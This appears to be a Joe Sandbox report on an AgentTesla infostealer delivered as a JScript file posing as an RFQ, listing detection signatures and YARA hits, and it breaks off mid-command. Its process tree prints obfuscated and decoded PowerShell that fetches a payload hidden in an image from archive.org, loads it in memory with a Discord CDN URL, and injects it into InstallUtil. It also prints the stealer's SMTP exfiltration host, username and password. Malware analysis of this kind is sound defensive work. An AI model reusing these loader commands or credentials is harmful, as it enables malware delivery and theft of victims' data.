Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ448903423_MAT_HASUE_de_Mexico.js

Overview

General Information

Sample name:RFQ448903423_MAT_HASUE_de_Mexico.js
Analysis ID:1499556
MD5:dc966ae12a9be2e08487ced17081dc04
SHA1:4e500a3a745dc042ee6d480152454ed4b6a15a93
SHA256:21c71c210183e6046dfc4932d8f87c7d3acc167c9c5e363e8a9f1b6c2d5dd993
Tags:js
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected MSILDownloaderGeneric
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 652 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ? GU? ? ? ? e? ? ? ? B0? ? ? ? C4? ? ? ? SQBu? ? ? ? GQ? ? ? ? ZQB4? ? ? ? E8? ? ? ? Zg? ? ? ? o? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? ZQBu? ? ? ? GQ? ? ? ? SQBu? ? ? ? GQ? ? ? ? ZQB4? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? FQ? ? ? ? ZQB4? ? ? ? HQ? ? ? ? LgBJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? TwBm? ? ? ? Cg? ? ? ? J? ? ? ? Bl? ? ? ? G4? ? ? ? Z? ? ? ? BG? ? ? ? Gw? ? ? ? YQBn? ? ? ? Ck? ? ? ? Ow? ? ? ? k? ? ? ? HM? ? ? ? d? ? ? ? Bh? ? ? ? HI? ? ? ? d? ? ? ? BJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? Gc? ? ? ? ZQ? ? ? ? g? ? ? ? D? ? ? ? ? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? GE? ? ? ? bgBk? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bl? ? ? ? G4? ? ? ? Z? ? ? ? BJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? Gc? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? Cs? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? LgBM? ? ? ? GU? ? ? ? bgBn? ? ? ? HQ? ? ? ? a? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? YgBh? ? ? ? HM? ? ? ? ZQ? ? ? ? 2? ? ? ? DQ? ? ? ? T? ? ? ? Bl? ? ? ? G4? ? ? ? ZwB0? ? ? ? Gg? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bl? ? ? ? G4? ? ? ? Z? ? ? ? BJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bz? ? ? ? HQ? ? ? ? YQBy? ? ? ? HQ? ? ? ? SQBu? ? ? ? GQ? ? ? ? ZQB4? ? ? ? Ds? ? ? ? J? ? ? ? Bi? ? ? ? GE? ? ? ? cwBl? ? ? ? DY? ? ? ? N? ? ? ? BD? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? FQ? ? ? ? ZQB4? ? ? ? HQ? ? ? ? LgBT? ? ? ? HU? ? ? ? YgBz? ? ? ? HQ? ? ? ? cgBp? ? ? ? G4? ? ? ? Zw? ? ? ? o? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? s? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bi? ? ? ? GE? ? ? ? cwBl? ? ? ? DY? ? ? ? N? ? ? ? BM? ? ? ? GU? ? ? ? bgBn? ? ? ? HQ? ? ? ? a? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bj? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? QwBv? ? ? ? G4? ? ? ? dgBl? ? ? ? HI? ? ? ? d? ? ? ? Bd? ? ? ? Do? ? ? ? OgBG? ? ? ? HI? ? ? ? bwBt? ? ? ? EI? ? ? ? YQBz? ? ? ? GU? ? ? ? Ng? ? ? ? 0? ? ? ? FM? ? ? ? d? ? ? ? By? ? ? ? Gk? ? ? ? bgBn? ? ? ? Cg? ? ? ? J? ? ? ? Bi? ? ? ? GE? ? ? ? cwBl? ? ? ? DY? ? ? ? N? ? ? ? BD? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? Ck? ? ? ? Ow? ? ? ? k? ? ? ? Gw? ? ? ? bwBh? ? ? ? GQ? ? ? ? ZQBk? ? ? ? EE? ? ? ? cwBz? ? ? ? GU? ? ? ? bQBi? ? ? ? Gw? ? ? ? eQ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? UgBl? ? ? ? GY? ? ? ? b? ? ? ? Bl? ? ? ? GM? ? ? ? d? ? ? ? Bp? ? ? ? G8? ? ? ? bg? ? ? ? u? ? ? ? EE? ? ? ? cwBz? ? ? ? GU? ? ? ? bQBi? ? ? ? Gw? ? ? ? eQBd? ? ? ? Do? ? ? ? OgBM? ? ? ? G8? ? ? ? YQBk? ? ? ? Cg? ? ? ? J? ? ? ? Bj? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? B0? ? ? ? Hk? ? ? ? c? ? ? ? Bl? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? b? ? ? ? Bv? ? ? ? GE? ? ? ? Z? ? ? ? Bl? ? ? ? GQ? ? ? ? QQBz? ? ? ? HM? ? ? ? ZQBt? ? ? ? GI? ? ? ? b? ? ? ? B5? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? V? ? ? ? B5? ? ? ? H? ? ? ? ? ? ? ? ZQ? ? ? ? o? ? ? ? Cc? ? ? ? Z? ? ? ? Bu? ? ? ? Gw? ? ? ? aQBi? ? ? ? C4? ? ? ? SQBP? ? ? ? C4? ? ? ? S? ? ? ? Bv? ? ? ? G0? ? ? ? ZQ? ? ? ? n? ? ? ? Ck? ? ? ? Ow? ? ? ? k? ? ? ? G0? ? ? ? ZQB0? ? ? ? Gg? ? ? ? bwBk? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? d? ? ? ? B5? ? ? ? H? ? ? ? ? ? ? ? ZQ? ? ? ? u? ? ? ? Ec? ? ? ? ZQB0? ? ? ? E0? ? ? ? ZQB0? ? ? ? Gg? ? ? ? bwBk? ? ? ? Cg? ? ? ? JwBW? ? ? ? EE? ? ? ? SQ? ? ? ? n? ? ? ? Ck? ? ? ? LgBJ? ? ? ? G4? ? ? ? dgBv? ? ? ? Gs? ? ? ? ZQ? ? ? ? o? ? ? ? CQ? ? ? ? bgB1? ? ? ? Gw? ? ? ? b? ? ? ? ? ? ? ? s? ? ? ? C? ? ? ? ? ? ? ? WwBv? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? Bb? ? ? ? F0? ? ? ? XQ? ? ? ? g? ? ? ? Cg? ? ? ? Jw? ? ? ? m? ? ? ? GY? ? ? ? O? ? ? ? ? ? ? ? x? ? ? ? DU? ? ? ? ZQ? ? ? ? 1? ? ? ? GY? ? ? ? Yg? ? ? ? 3? ? ? ? DQ? ? ? ? OQ? ? ? ? x? ? ? ? D? ? ? ? ? ? ? ? NgBm? ? ? ? DI? ? ? ? MQ? ? ? ? 3? ? ? ? DI? ? ? ? OQBj? ? ? ? DU? ? ? ? O? ? ? ? Bl? ? ? ? GU? ? ? ? OQBk? ? ? ? DU? ? ? ? Z? ? ? ? ? ? ? ? 0? ? ? ? DM? ? ? ? Ng? ? ? ? y? ? ? ? GY? ? ? ? MQ? ? ? ? x? ? ? ? DM? ? ? ? Z? ? ? ? ? ? ? ? 5? ? ? ? GQ? ? ? ? YgBj? ? ? ? DY? ? ? ? OQBl? ? ? ? Dc? ? ? ? MgBl? ? ? ? D? ? ? ? ? ? ? ? Yg? ? ? ? 2? ? ? ? DQ? ? ? ? Yg? ? ? ? z? ? ? ? GM? ? ? ? M? ? ? ? ? ? ? ? 0? ? ? ? GM? ? ? ? NQ? ? ? ? 3? ? ? ? DQ? ? ? ? Yw? ? ? ? x? ? ? ? GQ? ? ? ? PQBt? ? ? ? Gg? ? ? ? Jg? ? ? ? w? ? ? ? DM? ? ? ? YQBh? ? ? ? GM? ? ? ? Yw? ? ? ? 2? ? ? ? DY? ? ? ? PQBz? ? ? ? Gk? ? ? ? Jg? ? ? ? w? ? ? ? GI? ? ? ? YgBm? ? ? ? GQ? ? ? ? Yw? ? ? ? 2? ? ? ? DY? ? ? ? PQB4? ? ? ? GU? ? ? ? PwB0? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? Ec? ? ? ? SQBS? ? ? ? E8? ? ? ? Lw? ? ? ? 5? ? ? ? DI? ? ? ? O? ? ? ? ? ? ? ? y? ? ? ? DU? ? ? ? NQ? ? ? ? 5? ? ? ? DE? ? ? ? N? ? ? ? ? ? ? ? x? ? ? ? Dg? ? ? ? Nw? ? ? ? y? ? ? ? DY? ? ? ? Ng? ? ? ? 3? ? ? ? Dc? ? ? ? Mg? ? ? ? x? ? ? ? C8? ? ? ? OQ? ? ? ? 1? ? ? ? DQ? ? ? ? Nw? ? ? ? 1? ? ? ? DE? ? ? ? Mw? ? ? ? 5? ? ? ? D? ? ? ? ? ? ? ? M? ? ? ? ? ? ? ? 4? ? ? ? DE? ? ? ? Mw? ? ? ? z? ? ? ? DQ? ? ? ? Nw? ? ? ? 3? ? ? ? DI? ? ? ? MQ? ? ? ? v? ? ? ? HM? ? ? ? d? ? ? ? Bu? ? ? ? GU? ? ? ? bQBo? ? ? ? GM? ? ? ? YQB0? ? ? ? HQ? ? ? ? YQ? ? ? ? v? ? ? ? G0? ? ? ? bwBj? ? ? ? C4? ? ? ? c? ? ? ? Bw? ? ? ? GE? ? ? ? Z? ? ? ? By? ? ? ? G8? ? ? ? YwBz? ? ? ? Gk? ? ? ? Z? ? ? ? ? ? ? ? u? ? ? ? G4? ? ? ? Z? ? ? ? Bj? ? ? ? C8? ? ? ? Lw? ? ? ? 6? ? ? ? HM? ? ? ? c? ? ? ? B0? ? ? ? HQ? ? ? ? a? ? ? ? ? ? ? ? n? ? ? ? C? ? ? ? ? ? ? ? L? ? ? ? ? ? ? ? g? ? ? ? Cc? ? ? ? MQ? ? ? ? n? ? ? ? C? ? ? ? ? ? ? ? L? ? ? ? ? ? ? ? g? ? ? ? Cc? ? ? ? Qw? ? ? ? 6? ? ? ? Fw? ? ? ? U? ? ? ? By? ? ? ? G8? ? ? ? ZwBy? ? ? ? GE? ? ? ? bQBE? ? ? ? GE? ? ? ? d? ? ? ? Bh? ? ? ? Fw? ? ? ? Jw? ? ? ? g? ? ? ? Cw? ? ? ? I? ? ? ? ? ? ? ? n? ? ? ? H? ? ? ? ? ? ? ? YQBk? ? ? ? HI? ? ? ? YQBs? ? ? ? Cc? ? ? ? L? ? ? ? ? ? ? ? n? ? ? ? Ek? ? ? ? bgBz? ? ? ? HQ? ? ? ? YQBs? ? ? ? Gw? ? ? ? VQB0? ? ? ? Gk? ? ? ? b? ? ? ? ? ? ? ? n? ? ? ? Cw? ? ? ? JwBk? ? ? ? GU? ? ? ? cwBh? ? ? ? HQ? ? ? ? aQB2? ? ? ? GE? ? ? ? Z? ? ? ? Bv? ? ? ? Cc? ? ? ? KQ? ? ? ? p? ? ? ? ? ? ? ? ==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 6784 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • InstallUtil.exe (PID: 7152 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • InstallUtil.exe (PID: 1632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.3317780029.0000000002A61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000008.00000002.3317780029.0000000002A3E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 13 entries
            SourceRuleDescriptionAuthorStrings
            4.2.powershell.exe.1ce9038cb90.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              4.2.powershell.exe.1ce9038cb90.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                4.2.powershell.exe.1ce9038cb90.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x33d0f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33d81:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x33e0b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33e9d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x33f07:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x33f79:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x3400f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x3409f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                8.2.InstallUtil.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  8.2.InstallUtil.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 6 entries
                    SourceRuleDescriptionAuthorStrings
                    amsi64_1964.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? 